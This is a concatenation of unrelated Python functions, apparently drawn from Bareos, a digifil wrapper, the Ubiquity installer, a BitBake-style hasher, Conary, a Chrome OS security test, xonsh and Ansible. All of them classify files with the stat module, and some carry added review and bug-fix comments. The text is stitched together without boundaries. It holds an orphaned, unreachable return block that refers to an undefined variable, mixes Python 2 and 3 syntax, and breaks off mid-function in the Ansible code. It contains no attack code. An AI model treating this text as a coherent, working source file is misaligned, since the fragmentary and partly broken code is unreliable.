def plugin_io_open(self, context, IOP):
    """Open the file requested by the Bareos core.

    Directories, symlinks and FIFOs are only classified (never opened);
    regular files are opened for reading or writing depending on
    IOP.flags, creating missing parent directories on restore.

    Returns bRCs["bRC_OK"] on success, bRCs["bRC_Error"] if the open
    fails (IOP.status is set to -1 in that case).
    """
    self.FNAME = IOP.fname.decode("string_escape")
    bareosfd.DebugMessage(
        context, 250, "io_open: self.FNAME is set to %s\n" % (self.FNAME))

    # Classify non-regular files first; they are never opened.
    if os.path.isdir(self.FNAME):
        bareosfd.DebugMessage(context, 100,
                              "%s is a directory\n" % (self.FNAME))
        self.fileType = "FT_DIR"
    elif os.path.islink(self.FNAME):
        self.fileType = "FT_LNK"
    elif os.path.exists(self.FNAME) and stat.S_ISFIFO(
            os.stat(self.FNAME).st_mode):
        self.fileType = "FT_FIFO"
    else:
        self.fileType = "FT_REG"

    if self.fileType != "FT_REG":
        # Deduplicated: the original repeated this message in every branch.
        bareosfd.DebugMessage(
            context,
            100,
            "Did not open file %s of type %s\n" % (self.FNAME, self.fileType),
        )
        return bRCs["bRC_OK"]

    bareosfd.DebugMessage(
        context,
        150,
        "file %s has type %s - trying to open it\n" %
        (self.FNAME, self.fileType),
    )
    try:
        if IOP.flags & (os.O_CREAT | os.O_WRONLY):
            # Restore path: ensure the target directory exists first.
            bareosfd.DebugMessage(
                context,
                100,
                "Open file %s for writing with %s\n" % (self.FNAME, IOP),
            )
            dirname = os.path.dirname(self.FNAME)
            if not os.path.exists(dirname):
                bareosfd.DebugMessage(
                    context,
                    100,
                    "Directory %s does not exist, creating it now\n" %
                    (dirname),
                )
                os.makedirs(dirname)
            self.file = open(self.FNAME, "wb")
        else:
            bareosfd.DebugMessage(
                context,
                100,
                "Open file %s for reading with %s\n" % (self.FNAME, IOP),
            )
            self.file = open(self.FNAME, "rb")
    except (OSError, IOError):
        # Bug fix: was a bare "except:", which would also swallow
        # KeyboardInterrupt/SystemExit. Only I/O failures map to bRC_Error.
        IOP.status = -1
        return bRCs["bRC_Error"]
    return bRCs["bRC_OK"]
def run_digifil(hdr, fil_out_dir=None, start=1, nsecs=120, nchan=128,
                overwrite=False, pol=2, nbit=8, tscrunch=1, nthreads=1,
                dm=0.0, coherent=False):
    """Convert a dada .hdr recording to a SIGPROC filterbank via digifil.

    Parameters mirror the digifil command line: start/nsecs select the
    time span, nchan/pol/nbit control channelisation, polarisation
    products and output bit depth, tscrunch sets time averaging, dm and
    coherent enable (coherent) dedispersion.

    Returns the path of the created filterbank file.

    Raises InputError on invalid arguments or a pre-existing output file
    (unless overwrite=True), RunError if digifil exits non-zero.
    """
    filterbankfile = hdr.replace('.hdr', '.fil')
    if fil_out_dir is not None:
        filterbankfile = '{0}/{1}'.format(fil_out_dir,
                                          os.path.basename(filterbankfile))
    if os.path.exists(filterbankfile):
        if overwrite:
            # Never unlink a FIFO; a downstream consumer may be reading it.
            if not stat.S_ISFIFO(os.stat(filterbankfile).st_mode):
                os.remove(filterbankfile)
        else:
            raise InputError(
                'Filterbankfile {0} exists already. '.format(filterbankfile) +
                'Delete first or set --force to overwrite')
    valid_nbit = [2, 8, 16, -32]
    if nbit not in valid_nbit:
        raise InputError(
            f'nbit={nbit} not in supported values of {valid_nbit}. ')
    if tscrunch > 1:
        cmd = 'digifil -cont -c -b{4} -S{0} -T{1} -2 -D 0.0 -t {6} -o {2} {3} -threads {5}'.format(
            start, nsecs, filterbankfile, hdr, nbit, nthreads, tscrunch)
    else:
        cmd = 'digifil -cont -c -b{4} -S{0} -T{1} -2 -D 0.0 -o {2} {3} -threads {5}'.format(
            start, nsecs, filterbankfile, hdr, nbit, nthreads)
    # Extra channels passed to -F to mitigate spectral leakage.
    leakage_factor = 512 if nchan <= 128 else 2 * nchan
    if pol < 2:
        # Single polarisation channel selected with -P.
        cmd = '{0} -P{1} -F{2}:{3}'.format(cmd, pol, nchan, leakage_factor)
    else:
        if pol == 2:
            # get Stokes I, i.e. PP+QQ
            cmd = '{0} -d1 -F{1}:{2}'.format(cmd, nchan, leakage_factor)
        elif pol == 4:
            # full pol, PP,QQ,PQ,QP
            cmd = '{0} -d4 -F{1}:{2}'.format(cmd, nchan, leakage_factor)
        elif pol == 3:
            # (PP+QQ)^2
            cmd = '{0} -d3 -F{1}:{2}'.format(cmd, nchan, leakage_factor)
        else:
            raise InputError(
                f'pol = {pol} not implemented. Choices are 0, 1, 2, 3, 4')
    if dm > 0.0:
        cmd = '{0} -D {1}'.format(cmd, dm)
    if coherent:
        cmd = '{0} -F{1}:D'.format(cmd, nchan)
    print('running {0}'.format(cmd))
    # Capture digifil's stdout/stderr so they can be reported on failure.
    # (Also stops shadowing the builtin `id`.)
    outfile_nme = '/tmp/digifil.{0}'.format(id_generator())
    errfile_nme = '/tmp/digifil.{0}'.format(id_generator())
    try:
        with open(outfile_nme, 'w') as outfile, \
                open(errfile_nme, 'w') as errfile:
            subprocess.check_call(cmd, shell=True, stdout=outfile,
                                  stderr=errfile)
    except subprocess.CalledProcessError:
        # Bug fix: the original passed the (still open, write-mode) file
        # *objects* to open(), which raises TypeError and masked the real
        # diagnostics. Re-open by file name instead.
        with open(outfile_nme, 'r') as f:
            stdout = f.readlines()
        with open(errfile_nme, 'r') as f:
            stderr = f.readlines()
        raise RunError(
            f'Digifil died. \n stdout reports \n {stdout} \n stderr reports \n {stderr}'
        )
    return filterbankfile
def is_piped(file_obj):
    """Return True when *file_obj* is a pipe (FIFO) or a file redirect."""
    st_mode = os.fstat(file_obj.fileno()).st_mode
    return any(check(st_mode) for check in (stat.S_ISFIFO, stat.S_ISREG))
    # NOTE(review): this `return` is the tail of a function whose `def`
    # line lies above this chunk — presumably it builds the JSON payload
    # for an upload; confirm against the enclosing definition.
    return {
        'name': args.name,
        'tag': args.tag,
        'language': args.language,
        content_or_file: content  # key chosen elsewhere: inline content vs. file reference
    }


if __name__ == '__main__':
    print("Running...")
    # st_mode of fd 0 (stdin) tells us whether input is piped in.
    mode = os.fstat(0).st_mode
    # This is to check if data is being piped in,
    # we'll add this later
    if stat.S_ISFIFO(mode):
        #text = sys.stdin.read()
        txt = []
        for line in fileinput.input():
            # NOTE(review): strip('') strips nothing — likely meant
            # strip() or strip('\n'); confirm intent before changing.
            txt.append(line.strip(''))
        print(" ".join(txt))
        print(fileinput.filename())
        text = " ".join(txt)
        #upload(text)
    else:
        # Data is NOT being piped in, normal cli tools
        # Cool **parse_flag works with unpacking
        u = Upload(**parse_flag())
        u.create_json()
def copy_all(self):
    """Core copy process. This is the most important step of this stage.
    It clones live filesystem into a local partition in the selected
    hard disk."""
    self.db.progress('START', 0, 100, 'ubiquity/install/title')
    self.db.progress('INFO', 'ubiquity/install/copying')

    # Total bytes to copy: prefer the precomputed /casper/filesystem.size.
    fs_size = os.path.join(self.casper_path, 'filesystem.size')
    if os.path.exists(fs_size):
        with open(fs_size) as total_size_fp:
            total_size = int(total_size_fp.readline())
    else:
        # Fallback in case an Xenta OS derivative forgets to put
        # /casper/filesystem.size on the CD, or to account for things
        # like CD->USB transformation tools that don't copy this file.
        # This is slower than just reading the size from a file, but
        # better than crashing.
        #
        # Obviously doing os.walk() twice is inefficient, but I'd rather
        # not suck the list into ubiquity's memory, and I'm guessing
        # that the kernel's dentry cache will avoid most of the slowness
        # anyway.
        total_size = 0
        for dirpath, dirnames, filenames in os.walk(self.source):
            for name in dirnames + filenames:
                fqpath = os.path.join(dirpath, name)
                total_size += os.lstat(fqpath).st_size

    # Progress bar handling:
    # We sample progress every half-second (assuming time.time() gives
    # us sufficiently good granularity) and use the average of progress
    # over the last minute or so to decide how much time remains. We
    # don't bother displaying any progress for the first ten seconds in
    # order to allow things to settle down, and we only update the "time
    # remaining" indicator at most every two seconds after that.
    copy_progress = 0
    copied_size = 0
    directory_times = []  # (path, atime, mtime), applied after the copy
    time_start = time.time()
    times = [(time_start, copied_size)]  # sliding window of samples
    long_enough = False
    time_last_update = time_start
    debug = 'UBIQUITY_DEBUG' in os.environ
    if self.db.get('ubiquity/install/md5_check') == 'false':
        md5_check = False
    else:
        md5_check = True

    # Increase kernel flush times during bulk data copying to make it
    # more likely that small files are packed contiguously, which should
    # speed up initial boot times.
    dirty_writeback_centisecs = None
    dirty_expire_centisecs = None
    if os.path.exists('/proc/sys/vm/dirty_writeback_centisecs'):
        with open('/proc/sys/vm/dirty_writeback_centisecs') as dwc:
            dirty_writeback_centisecs = int(dwc.readline())
        with open('/proc/sys/vm/dirty_writeback_centisecs', 'w') as dwc:
            print('3000\n', file=dwc)
    if os.path.exists('/proc/sys/vm/dirty_expire_centisecs'):
        with open('/proc/sys/vm/dirty_expire_centisecs') as dec:
            dirty_expire_centisecs = int(dec.readline())
        with open('/proc/sys/vm/dirty_expire_centisecs', 'w') as dec:
            print('6000\n', file=dec)

    # umask 0 so created entries carry exactly the source mode bits;
    # restored at the end of this method.
    old_umask = os.umask(0)
    for dirpath, dirnames, filenames in os.walk(self.source):
        sp = dirpath[len(self.source) + 1:]
        for name in dirnames + filenames:
            relpath = os.path.join(sp, name)
            # /etc/fstab was legitimately created by partman, and
            # shouldn't be copied again. Similarly, /etc/crypttab may
            # have been legitimately created by the user-setup plugin.
            if relpath in ("etc/fstab", "etc/crypttab"):
                continue
            sourcepath = os.path.join(self.source, relpath)
            targetpath = os.path.join(self.target, relpath)
            st = os.lstat(sourcepath)

            # Is the path blacklisted?
            if (not stat.S_ISDIR(st.st_mode) and
                    '/%s' % relpath in self.blacklist):
                if debug:
                    syslog.syslog('Not copying %s' % relpath)
                continue

            # Remove the target if necessary and if we can.
            install_misc.remove_target(self.source, self.target, relpath, st)

            # Now actually copy source to target.
            mode = stat.S_IMODE(st.st_mode)
            if stat.S_ISLNK(st.st_mode):
                linkto = os.readlink(sourcepath)
                os.symlink(linkto, targetpath)
            elif stat.S_ISDIR(st.st_mode):
                if not os.path.isdir(targetpath):
                    try:
                        os.mkdir(targetpath, mode)
                    except OSError as e:
                        # there is a small window where update-apt-cache
                        # can race with us since it creates
                        # "/target/var/cache/apt/...". Hence, ignore
                        # failure if the directory does now exist where
                        # brief moments before it didn't.
                        if e.errno != errno.EEXIST:
                            raise
            elif stat.S_ISCHR(st.st_mode):
                os.mknod(targetpath, stat.S_IFCHR | mode, st.st_rdev)
            elif stat.S_ISBLK(st.st_mode):
                os.mknod(targetpath, stat.S_IFBLK | mode, st.st_rdev)
            elif stat.S_ISFIFO(st.st_mode):
                os.mknod(targetpath, stat.S_IFIFO | mode)
            elif stat.S_ISSOCK(st.st_mode):
                os.mknod(targetpath, stat.S_IFSOCK | mode)
            elif stat.S_ISREG(st.st_mode):
                install_misc.copy_file(self.db, sourcepath, targetpath,
                                       md5_check)

            # Copy metadata.
            copied_size += st.st_size
            os.lchown(targetpath, st.st_uid, st.st_gid)
            if not stat.S_ISLNK(st.st_mode):
                os.chmod(targetpath, mode)
            if stat.S_ISDIR(st.st_mode):
                # Defer: copying files into the dir would bump its mtime.
                directory_times.append(
                    (targetpath, st.st_atime, st.st_mtime))
            # os.utime() sets timestamp of target, not link
            elif not stat.S_ISLNK(st.st_mode):
                try:
                    os.utime(targetpath, (st.st_atime, st.st_mtime))
                except Exception:
                    # We can live with timestamps being wrong.
                    pass
            # Preserve extended attributes where the platform supports it.
            if (hasattr(os, "listxattr") and
                    hasattr(os, "supports_follow_symlinks") and
                    os.supports_follow_symlinks):
                try:
                    attrnames = os.listxattr(sourcepath,
                                             follow_symlinks=False)
                    for attrname in attrnames:
                        attrvalue = os.getxattr(sourcepath, attrname,
                                                follow_symlinks=False)
                        os.setxattr(targetpath, attrname, attrvalue,
                                    follow_symlinks=False)
                except OSError as e:
                    if e.errno not in (errno.EPERM, errno.ENOTSUP,
                                       errno.ENODATA):
                        raise

            # Copy phase owns 90% of the progress bar (offset by 10).
            if int((copied_size * 90) / total_size) != copy_progress:
                copy_progress = int((copied_size * 90) / total_size)
                self.db.progress('SET', 10 + copy_progress)

            time_now = time.time()
            if (time_now - times[-1][0]) >= 0.5:
                times.append((time_now, copied_size))
                if not long_enough and time_now - times[0][0] >= 10:
                    long_enough = True
                if long_enough and time_now - time_last_update >= 2:
                    time_last_update = time_now
                    # Keep roughly the last minute of samples.
                    while (time_now - times[0][0] > 60 and
                           time_now - times[1][0] >= 60):
                        times.pop(0)
                    speed = ((times[-1][1] - times[0][1]) /
                             (times[-1][0] - times[0][0]))
                    if speed != 0:
                        time_remaining = (int(
                            (total_size - copied_size) / speed))
                        if time_remaining < 60:
                            self.db.progress(
                                'INFO', 'ubiquity/install/copying_minute')

    # Apply timestamps to all directories now that the items within them
    # have been copied.
    for dirtime in directory_times:
        (directory, atime, mtime) = dirtime
        try:
            os.utime(directory, (atime, mtime))
        except Exception:
            # I have no idea why I've been getting lots of bug reports
            # about this failing, but I really don't care. Ignore it.
            pass

    # Revert to previous kernel flush times.
    if dirty_writeback_centisecs is not None:
        with open('/proc/sys/vm/dirty_writeback_centisecs', 'w') as dwc:
            print(dirty_writeback_centisecs, file=dwc)
    if dirty_expire_centisecs is not None:
        with open('/proc/sys/vm/dirty_expire_centisecs', 'w') as dec:
            print(dirty_expire_centisecs, file=dec)

    # Try some possible locations for the kernel we used to boot. This
    # lets us save a couple of megabytes of CD space.
    bootdir = self.target_file('boot')
    kernel = self.find_cd_kernel()
    if kernel:
        prefix = os.path.basename(kernel).split('-', 1)[0]
        release = os.uname()[2]
        target_kernel = os.path.join(bootdir, '%s-%s' % (prefix, release))
        copies = []

        # ISO9660 images may have to use .efi rather than .efi.signed in
        # order to support being booted using isolinux, which must abide
        # by archaic 8.3 restrictions.
        for suffix in (".efi", ".efi.signed"):
            if os.path.exists(kernel + suffix):
                signed_kernel = kernel + suffix
                break
        else:
            signed_kernel = None

        if os.path.exists(kernel):
            copies.append((kernel, target_kernel))
        elif signed_kernel is not None:
            # No unsigned kernel. We'll construct it using sbsigntool.
            copies.append((signed_kernel, target_kernel))

        if signed_kernel is not None:
            copies.append((signed_kernel, "%s.efi.signed" % target_kernel))

        for source, target in copies:
            osextras.unlink_force(target)
            install_misc.copy_file(self.db, source, target, md5_check)
            os.lchown(target, 0, 0)
            os.chmod(target, 0o644)
            st = os.lstat(source)
            try:
                os.utime(target, (st.st_atime, st.st_mtime))
            except Exception:
                # We can live with timestamps being wrong.
                pass

        if not os.path.exists(kernel) and signed_kernel is not None:
            # Construct the unsigned kernel.
            subprocess.check_call(["sbattach", "--remove", target_kernel])

    os.umask(old_umask)

    self.db.progress('SET', 100)
    self.db.progress('STOP')
def process(path):
    """Feed an `ls -l`-style description of *path* into the running hash.

    Emits, via the enclosing scope's update_hash(): type char, rwx
    permission string (with s/S/t handling for setuid/setgid/sticky),
    optionally owner/group and mtime, device numbers or size, a content
    sha256 for regular files, the path, and the link target for symlinks.
    Assumes update_hash, include_owners and include_timestamps are
    provided by the enclosing scope.
    """
    s = os.lstat(path)

    # File type character, as ls would print it.
    if stat.S_ISDIR(s.st_mode):
        update_hash('d')
    elif stat.S_ISCHR(s.st_mode):
        update_hash('c')
    elif stat.S_ISBLK(s.st_mode):
        update_hash('b')
    elif stat.S_ISSOCK(s.st_mode):
        update_hash('s')
    elif stat.S_ISLNK(s.st_mode):
        update_hash('l')
    elif stat.S_ISFIFO(s.st_mode):
        update_hash('p')
    else:
        update_hash('-')

    def add_perm(mask, on, off='-'):
        # Emit `on` if the permission bit is set, else `off`.
        if mask & s.st_mode:
            update_hash(on)
        else:
            update_hash(off)

    add_perm(stat.S_IRUSR, 'r')
    add_perm(stat.S_IWUSR, 'w')
    # setuid: 's' if also executable, 'S' otherwise (ls convention).
    if stat.S_ISUID & s.st_mode:
        add_perm(stat.S_IXUSR, 's', 'S')
    else:
        add_perm(stat.S_IXUSR, 'x')

    add_perm(stat.S_IRGRP, 'r')
    add_perm(stat.S_IWGRP, 'w')
    # setgid: same s/S convention as setuid.
    if stat.S_ISGID & s.st_mode:
        add_perm(stat.S_IXGRP, 's', 'S')
    else:
        add_perm(stat.S_IXGRP, 'x')

    add_perm(stat.S_IROTH, 'r')
    add_perm(stat.S_IWOTH, 'w')
    # sticky bit takes precedence over the plain other-execute char.
    if stat.S_ISVTX & s.st_mode:
        update_hash('t')
    else:
        add_perm(stat.S_IXOTH, 'x')

    if include_owners:
        try:
            update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name)
            update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name)
        except KeyError as e:
            # uid/gid has no name on the build host — likely host
            # contamination; surface a detailed error.
            bb.warn("KeyError in %s" % path)
            msg = ("KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match "
                   "any user/group on target. This may be due to host contamination." %
                   (e, path, s.st_uid, s.st_gid))
            raise Exception(msg).with_traceback(e.__traceback__)

    if include_timestamps:
        update_hash(" %10d" % s.st_mtime)

    update_hash(" ")
    # Device nodes print major.minor where ls prints the size.
    if stat.S_ISBLK(s.st_mode) or stat.S_ISCHR(s.st_mode):
        update_hash("%9s" % ("%d.%d" % (os.major(s.st_rdev), os.minor(s.st_rdev))))
    else:
        update_hash(" " * 9)

    update_hash(" ")
    if stat.S_ISREG(s.st_mode):
        update_hash("%10d" % s.st_size)
    else:
        update_hash(" " * 10)

    update_hash(" ")
    fh = hashlib.sha256()
    if stat.S_ISREG(s.st_mode):
        # Hash file contents
        with open(path, 'rb') as d:
            for chunk in iter(lambda: d.read(4096), b""):
                fh.update(chunk)
        update_hash(fh.hexdigest())
    else:
        # Pad so the column width is identical for non-regular files.
        update_hash(" " * len(fh.hexdigest()))

    update_hash(" %s" % path)

    if stat.S_ISLNK(s.st_mode):
        update_hash(" -> %s" % os.readlink(path))

    update_hash("\n")
def FileFromFilesystem(path, pathId, possibleMatch=None, inodeInfo=False,
                       assumeRoot=False, statBuf=None, sha1FailOk=False):
    """Build a Conary file object describing *path* on the filesystem.

    pathId identifies the file within a trove; statBuf may supply a
    pre-fetched lstat result. If possibleMatch is a previously stored
    file object that still matches, it is returned instead of a fresh
    object (preserving its flags/fileids). Returns the file object, or
    (file, nlink, (rdev, ino)) when inodeInfo is True.

    Python 2 code (octal literal 07777, basestring).
    """
    if statBuf:
        s = statBuf
    else:
        s = os.lstat(path)

    global userCache, groupCache, _havePrelink

    if assumeRoot:
        owner = 'root'
        group = 'root'
    elif isinstance(s.st_uid, basestring):
        # Already stringified -- some capsule code will fabricate a stat result
        # from e.g. a RPM header
        owner = s.st_uid
        group = s.st_gid
    else:
        # + is not a valid char in user/group names; if the uid is not mapped
        # to a user, prepend it with + and store it as a string
        try:
            owner = userCache.lookupId('/', s.st_uid)
        except KeyError:
            owner = '+%d' % s.st_uid
        try:
            group = groupCache.lookupId('/', s.st_gid)
        except KeyError:
            group = '+%d' % s.st_gid

    needsSha1 = 0
    # 07777 keeps permission + setuid/setgid/sticky bits only.
    inode = InodeStream(s.st_mode & 07777, s.st_mtime, owner, group)

    # Dispatch on file type to the matching stream class.
    if (stat.S_ISREG(s.st_mode)):
        f = RegularFile(pathId)
        needsSha1 = 1
    elif (stat.S_ISLNK(s.st_mode)):
        f = SymbolicLink(pathId)
        if hasattr(s, 'linkto'):
            f.target.set(s.linkto)
        else:
            f.target.set(os.readlink(path))
    elif (stat.S_ISDIR(s.st_mode)):
        f = Directory(pathId)
    elif (stat.S_ISSOCK(s.st_mode)):
        f = Socket(pathId)
    elif (stat.S_ISFIFO(s.st_mode)):
        f = NamedPipe(pathId)
    elif (stat.S_ISBLK(s.st_mode)):
        f = BlockDevice(pathId)
        # Legacy 8-bit major/minor split of st_rdev.
        f.devt.major.set(s.st_rdev >> 8)
        f.devt.minor.set(s.st_rdev & 0xff)
    elif (stat.S_ISCHR(s.st_mode)):
        f = CharacterDevice(pathId)
        f.devt.major.set(s.st_rdev >> 8)
        f.devt.minor.set(s.st_rdev & 0xff)
    else:
        raise FilesError("unsupported file type for %s" % path)

    f.inode = inode
    f.flags = FlagsStream(0)

    # assume we have a match if the FileMode and object type match
    if possibleMatch and (possibleMatch.__class__ == f.__class__) \
            and f.inode == possibleMatch.inode \
            and f.inode.mtime() == possibleMatch.inode.mtime() \
            and (not s.st_size or
                 (possibleMatch.hasContents and
                  s.st_size == possibleMatch.contents.size())):
        f.flags.set(possibleMatch.flags())
        return possibleMatch
    elif (possibleMatch and (isinstance(f, RegularFile) and
            isinstance(possibleMatch, RegularFile))
            and (f.inode.isExecutable())
            and f.inode.mtime() == possibleMatch.inode.mtime()
            and f.inode.owner == possibleMatch.inode.owner
            and f.inode.group == possibleMatch.inode.group
            and f.inode.perms == possibleMatch.inode.perms):
        # executable RegularFiles match even if there sizes are different
        # as long as everything else is the same; this is to stop size
        # changes from prelink from changing fileids
        return possibleMatch

    if needsSha1:
        f.contents = RegularFileStream()

        # Prelinked executables are hashed through `prelink -u` so the
        # digest reflects the un-prelinked contents.
        undoPrelink = False
        if _havePrelink != False and f.inode.isExecutable():
            try:
                from conary.lib import elf
                if elf.prelinked(path):
                    undoPrelink = True
            except:
                pass
        if undoPrelink and _havePrelink is None:
            _havePrelink = bool(os.access(PRELINK_CMD[0], os.X_OK))
        if undoPrelink and _havePrelink:
            prelink = subprocess.Popen(
                PRELINK_CMD + ('-uo', '-', path),
                stdout=subprocess.PIPE,
                close_fds=True,
                shell=False)
            d = digestlib.sha1()
            content = prelink.stdout.read()
            size = 0
            while content:
                d.update(content)
                size += len(content)
                content = prelink.stdout.read()
            prelink.wait()
            # Size is taken from the un-prelinked stream, not st_size.
            f.contents.size.set(size)
            sha1 = d.digest()
        else:
            try:
                sha1 = sha1helper.sha1FileBin(path)
            except OSError:
                if sha1FailOk:
                    sha1 = sha1helper.sha1Empty
                else:
                    raise
            f.contents.size.set(s.st_size)
        f.contents.sha1.set(sha1)

    if inodeInfo:
        return (f, s.st_nlink, (s.st_rdev, s.st_ino))
    return f
def run_once(self):
    """
    Checks a number of sensitive processes on Chrome OS for unexpected
    open file descriptors.
    """
    self.snapshot_system()

    results = []
    fd_filters = [
        r'0700 anon_inode:\[event.*\]',
        r'0[35]00 pipe:.*',
        r'0[57]00 socket:.*',
        r'0500 /dev/null',
        r'0[57]00 /dev/urandom',
        r'0300 /var/log/chrome/chrome_.*',
        r'0[37]00 /var/log/ui/ui.*',
    ]

    # Whitelist fd-type check, suitable for Chrome processes.
    # Notably, this omits S_ISDIR.
    def _default_fd_type_check(mode):
        return (stat.S_ISREG(mode) or stat.S_ISCHR(mode)
                or stat.S_ISSOCK(mode) or stat.S_ISFIFO(mode)
                or security_OpenFDs._S_ISANONFD(mode))

    allowed_fd_type_check = _default_fd_type_check

    # TODO(jorgelo): revisit this and potentially remove.
    if asan.running_on_asan():
        # On ASan, allow all fd types and opening /proc
        logging.info("Running on ASan, allowing /proc")
        allowed_fd_type_check = lambda mode: True
        fd_filters.append(r'0500 /proc')

    results.append(
        self.check_process('chrome', 'type=plugin', fd_filters,
                           allowed_fd_type_check))

    fd_filters.extend([
        r'0[57]00 /dev/shm/..*',
        r'0500 /opt/google/chrome/.*.pak',
        r'0500 /opt/google/chrome/icudtl.dat',
        # These used to be bundled with the Chrome binary.
        # See crbug.com/475170.
        r'0500 /opt/google/chrome/natives_blob.bin',
        r'0500 /opt/google/chrome/snapshot_blob.bin',
        # Font files can be kept open in renderers
        # for performance reasons.
        # See crbug.com/452227.
        r'0500 /usr/share/fonts/.*',
        # Zero-copy texture uploads. crbug.com/607632.
        r'0700 anon_inode:dmabuf',
    ])
    try:
        # Renderers have access to DRM vgem device for graphics tile upload.
        # See crbug.com/537474.
        fd_filters.append(r'0700 /dev/dri/%s' %
                          os.readlink('/dev/dri/vgem'))
    except OSError:
        # /dev/dri/vgem doesn't exist.
        pass

    results.append(
        self.check_process('chrome', 'type=renderer', fd_filters,
                           allowed_fd_type_check))

    if False in results:
        raise error.TestFail("Unexpected open file descriptors.")
def color_file(file_path: str, mode: int) -> (Color, str):
    """Determine color to use for file as ls -c would, given stat() results
    and its name.

    Parameters
    ----------
    file_path : string
        relative path of file (as user typed it).
    mode : int
        stat() results for file_path.

    Returns
    -------
    color token, color_key

    Bugs
    ----
    * doesn't handle CA (capability)
    """
    # LS_COLORS mapping supplied by the xonsh environment.
    lsc = builtins.__xonsh__.env["LS_COLORS"]
    color_key = "rs"

    if stat.S_ISLNK(mode):  # must test link before S_ISREG (esp execute)
        color_key = "ln"
        try:
            # Follows the link: a failure means the target is gone.
            os.stat(file_path)
        except FileNotFoundError:
            color_key = "or"  # orphaned symlink
    elif stat.S_ISREG(mode):
        if stat.S_IMODE(mode) & (stat.S_IXUSR + stat.S_IXGRP + stat.S_IXOTH):
            color_key = "ex"
        elif (
            mode & stat.S_ISUID
        ):  # too many tests before we get to the common case -- restructure?
            color_key = "su"
        elif mode & stat.S_ISGID:
            color_key = "sg"
        else:
            match = color_file_extension_RE.match(file_path)
            if match:
                ext = "*" + match.group(1)  # look for *.<fileExtension> coloring
                if ext in lsc:
                    color_key = ext
                else:
                    color_key = "rs"
            else:
                color_key = "rs"
    elif stat.S_ISDIR(mode):  # ls -c doesn't colorize sticky or ow if not dirs...
        # Index trick: sticky bit contributes 2, other-writable contributes 1,
        # selecting among di/ow/st/tw.
        color_key = ("di", "ow", "st", "tw")[
            (mode & stat.S_ISVTX == stat.S_ISVTX) * 2
            + (mode & stat.S_IWOTH == stat.S_IWOTH)
        ]
    elif stat.S_ISCHR(mode):
        color_key = "cd"
    elif stat.S_ISBLK(mode):
        color_key = "bd"
    elif stat.S_ISFIFO(mode):
        color_key = "pi"
    elif stat.S_ISSOCK(mode):
        color_key = "so"
    elif stat.S_ISDOOR(mode):  # Solaris doors
        color_key = "do"
    # bug missing mapping for FMT based PORT and WHITEOUT ??

    ret_color_token = file_color_tokens.get(color_key, None)

    return ret_color_token, color_key
def run(self):
    """Run the playbook CLI: optionally install roles from a role file,
    validate the playbook paths, gather passwords, build inventory, and
    either execute the plays or list hosts/tasks/tags.

    Returns 0 on a list-mode run, otherwise the PlaybookExecutor result.
    """
    super(PlaybookCLI, self).run()

    # Note: slightly wrong, this is written so that implicit localhost
    # Manage passwords
    sshpass = None
    becomepass = None
    passwords = {}

    # Install roles via ansible-galaxy when a role file was given.
    if self.options.role_file:
        args = ["install"]
        if self.options.ignore_errors:
            args.append("--ignore-errors")
        force = ""  # NOTE(review): assigned but never used
        if self.options.force:
            args.append("--force")
        if self.options.roles_path:
            args.extend(["--roles-path", self.options.roles_path])
        if self.options.no_deps:
            args.append("--no-deps")
        args.extend(["--role-file", self.options.role_file])
        gc = GalaxyCLI(args=args)
        gc.parse()
        gc.run()

    # initial error check, to make sure all specified playbooks are accessible
    # before we start running anything through the playbook executor
    for playbook in self.args:
        if not os.path.exists(playbook):
            raise AnsibleError("the playbook: %s could not be found" % playbook)
        # FIFOs are accepted so playbooks can be piped in.
        if not (os.path.isfile(playbook) or
                stat.S_ISFIFO(os.stat(playbook).st_mode)):
            raise AnsibleError(
                "the playbook: %s does not appear to be a file" % playbook)

    # don't deal with privilege escalation or passwords when we don't need to
    if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax:
        self.normalize_become_options()
        (sshpass, becomepass) = self.ask_passwords()
        passwords = {'conn_pass': sshpass, 'become_pass': becomepass}

    loader, inventory, variable_manager = self._play_prereqs(self.options)

    # (which is not returned in list_hosts()) is taken into account for
    # warning if inventory is empty. But it can't be taken into account for
    # checking if limit doesn't match any hosts. Instead we don't worry about
    # limit if only implicit localhost was in inventory to start with.
    #
    # Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts())
    no_hosts = False
    if len(inventory.list_hosts()) == 0:
        # Empty inventory
        display.warning(
            "provided hosts list is empty, only localhost is available")
        no_hosts = True
    inventory.subset(self.options.subset)
    if len(inventory.list_hosts()) == 0 and no_hosts is False:
        # Invalid limit
        raise AnsibleError("Specified --limit does not match any hosts")

    # flush fact cache if requested
    if self.options.flush_cache:
        self._flush_cache(inventory, variable_manager)

    # create the playbook executor, which manages running the plays via a task queue manager
    pbex = PlaybookExecutor(playbooks=self.args,
                            inventory=inventory,
                            variable_manager=variable_manager,
                            loader=loader,
                            options=self.options,
                            passwords=passwords)

    results = pbex.run()

    # A list result means we ran in a "list" mode; format and print it.
    if isinstance(results, list):
        for p in results:
            display.display('\nplaybook: %s' % p['playbook'])
            for idx, play in enumerate(p['plays']):
                if play._included_path is not None:
                    loader.set_basedir(play._included_path)
                else:
                    pb_dir = os.path.realpath(
                        os.path.dirname(p['playbook']))
                    loader.set_basedir(pb_dir)

                msg = "\n play #%d (%s): %s" % (idx + 1, ','.join(
                    play.hosts), play.name)
                mytags = set(play.tags)
                msg += '\tTAGS: [%s]' % (','.join(mytags))

                if self.options.listhosts:
                    playhosts = set(inventory.get_hosts(play.hosts))
                    msg += "\n pattern: %s\n hosts (%d):" % (
                        play.hosts, len(playhosts))
                    for host in playhosts:
                        msg += "\n %s" % host

                display.display(msg)

                all_tags = set()
                if self.options.listtags or self.options.listtasks:
                    taskmsg = ''
                    if self.options.listtasks:
                        taskmsg = ' tasks:\n'

                    def _process_block(b):
                        # Recursively render a task block, collecting tags.
                        taskmsg = ''
                        for task in b.block:
                            if isinstance(task, Block):
                                taskmsg += _process_block(task)
                            else:
                                if task.action == 'meta':
                                    continue
                                all_tags.update(task.tags)
                                if self.options.listtasks:
                                    cur_tags = list(
                                        mytags.union(set(task.tags)))
                                    cur_tags.sort()
                                    if task.name:
                                        taskmsg += " %s" % task.get_name()
                                    else:
                                        taskmsg += " %s" % task.action
                                    taskmsg += "\tTAGS: [%s]\n" % ', '.join(
                                        cur_tags)
                        return taskmsg

                    all_vars = variable_manager.get_vars(play=play)
                    play_context = PlayContext(play=play,
                                               options=self.options)
                    for block in play.compile():
